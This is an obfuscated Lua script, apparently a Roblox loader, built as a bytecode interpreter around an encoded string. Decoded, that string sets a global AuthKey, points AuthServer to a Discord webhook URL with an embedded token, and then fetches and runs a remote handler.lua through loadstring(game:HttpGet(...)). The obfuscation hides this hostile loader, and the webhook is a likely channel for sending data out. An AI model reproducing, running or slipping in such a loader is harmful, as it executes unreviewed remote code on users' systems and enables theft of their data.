--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/(2^(v32-(4 -3))))%((1 + 1)^(((v33-(1 + 0)) -(v32-1)) + (1 -0)));return v76-(v76%((2161 -(280 + 301)) -(1476 + 103)));else local v77=((4 -2) + 0)^(v32-1);return (((v31%(v77 + v77))>=v77) and (1756 -((1781 -(408 + 188)) + 570))) or (0 -0);end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + (1337 -(724 + 611)));v18=v18 + (4 -2);return (v40 * (245 + 11)) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (1272 -(73 + (1805 -(532 + 77)))));v18=v18 + (18 -14);return (v44 * (26552490 -(9775566 -(13 + 279)))) + (v43 * (308573 -(115122 + 127915))) + (v42 * (2168 -(1875 + 37))) + v41;end local function v24()local v45=v23();local v46=v23();local v47=2 -(1 -0);local v48=(v20(v46,1 + 0,1080 -(796 + (474 -(152 + 58)))) * ((3 -1)^(532 -(148 + 349 + 3)))) + v45;local v49=v20(v46,21,1488 -(108 + 1349));local v50=((v20(v46,32)==(827 -(120 + 706))) and  -(2 -1)) or (1 + 0);if (v49==(0 -0)) then if (v48==0) then return v50 * (402 -(102 + 300));else v49=513 -(470 + 42);v47=0 + 0;end elseif (v49==2047) then return ((v48==0) and (v50 * ((1 -0)/((32 -(4 + 28)) -0)))) or (v50 * NaN);end return v8(v50,v49-(808 + 215)) * (v47 + (v48/((1306 -(130 + (2654 -1480)))^(177 -125))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==0) then return "";end end v51=v3(v16,v18,(v18 + v34) -(796 -(405 + 390)));v18=v18 + v34;local v52={};for v63=2 -1, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1 + 0,v57 do local v66=v21();local v67;if (v66==(1 + 0)) then v67=v21()~=0;elseif (v66==(1 + 1)) then v67=v24();elseif (v66==(14 -11)) then v67=v25();end v58[v65]=v67;end v56[1 + 2]=v21();for v69=152 -(12 + 139),v23() do local v70=v21();if (v20(v70,1 + 0,2 -1)==(0 -0)) then local v83=v20(v70,1522 -(421 + 1099),1 + 2);local v84=v20(v70,4,9 -3);local v85={v22(),v22(),nil,nil};if (v83==(0 + 0)) then v85[1346 -(40 + 1303)]=v22();v85[4]=v22();elseif (v83==1) then v85[1928 -(558 + 1367)]=v23();elseif (v83==(5 -3)) then v85[10 -7]=v23() -((2 + 0)^(69 -53));elseif (v83~=(33 -(26 + 4))) then else v85[1742 -(1431 + 308)]=v23() -((5 -3)^(16 + 0));v85[10 -6]=v22();end if (v20(v84,1,139 -(101 + 37))~=(419 -(199 + 219))) then else v85[2]=v58[v85[5 -3]];end if (v20(v84,6 -4,2 + 0)~=1) then else v85[1346 -(22 + 1321)]=v58[v85[82 -(51 + 28)]];end if (v20(v84,3 -0,524 -(363 + 158))~=1) then else v85[9 -5]=v58[v85[267 -(147 + 116)]];end v53[v69]=v85;end end for v71=1 + 0,v23() do v54[v71-1]=v28();end for v73=632 -(382 + 249),v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=(846 -(702 + 144)) -0,v81 do if ((v107>=v90) or ((4403 -3070)>(9544 -(16762 -9214)))) then v92[v107-v90]=v80[v107 + (3 -2)];else v94[v107]=v80[v107 + (1 -0)];end end local v95=(v81-v90) + (749 -(229 + 519));local v96;local v97;while true do v96=v88[v78];v97=v96[1507 -(1489 + 17)];if ((v97<=(7 -4)) or ((2995 + 1125)<=(2991 -(333 + 13)))) then if (((3594 -(88 + 150))>=((9799 -(159 + 1042)) -5707)) and (v97<=((2 -1) + 0))) then if ((v97>((870 -(579 + 145)) -(39 + 107))) or ((1960 -(986 + (1449 -(350 + 489))))>(3807 + 393))) then v94[v96[1857 -(209 + 1646)]]();else v94[v96[3 -(375 -(103 + 271))]][v96[11 -8]]=v96[8 -(2 + 2)];end elseif ((v97>(7 -5)) or ((6726 -4110)>=(8393 -5566))) then local v120=v96[(5 -3) + (0 -0)];local v121,v122=v91(v94[v120](v13(v94,v120 + (2 -1),v96[3])));v79=(v122 + v120) -(1 -0);local v123=0 + 0;for v135=v120,v79 do v123=v123 + 1;v94[v135]=v121[v123];end else v94[v96[4 -2]]=v37[v96[3]];end elseif ((1478<=1711) and (v97<=(5 + 0))) then if ((v97>(13 -9)) or (3669<=(1403 -485))) then local v126=v96[2 + 0];v94[v126]=v94[v126](v13(v94,v126 + (1241 -(1131 + 109)),v79));else local v128=v96[2 -(0 + 0)];local v129=v94[v96[3]];v94[v128 + (1 -0)]=v129;v94[v128]=v129[v96[5 -1]];end elseif (((4902 -2477)<(7742 -5177)) and (v97>6)) then do return;end else v94[v96[5 -3]]=v96[2 + 1];end v78=v78 + (4 -3);end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703073O00417574684B6579022O00804E2059E741030A3O004175746853657276657203783O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3938373433363O373233303936323734382F52497252325F654C4F3553634C5F56554B35315851674A54675A577946784F6444533970474653654753437866465846634665643544314D624331792D313934325F705F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032C3O00682O7470733A2O2F64617269616E6465762E636F6D2F682O74705F7374752O662F68616E646C65722E6C7561000C3O0012023O00013O00304O000200030012023O00013O00304O000400050012023O00063O001202000100073O002004000100010008001206000300094O0003000100034O00055O00022O00013O000100012O00073O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
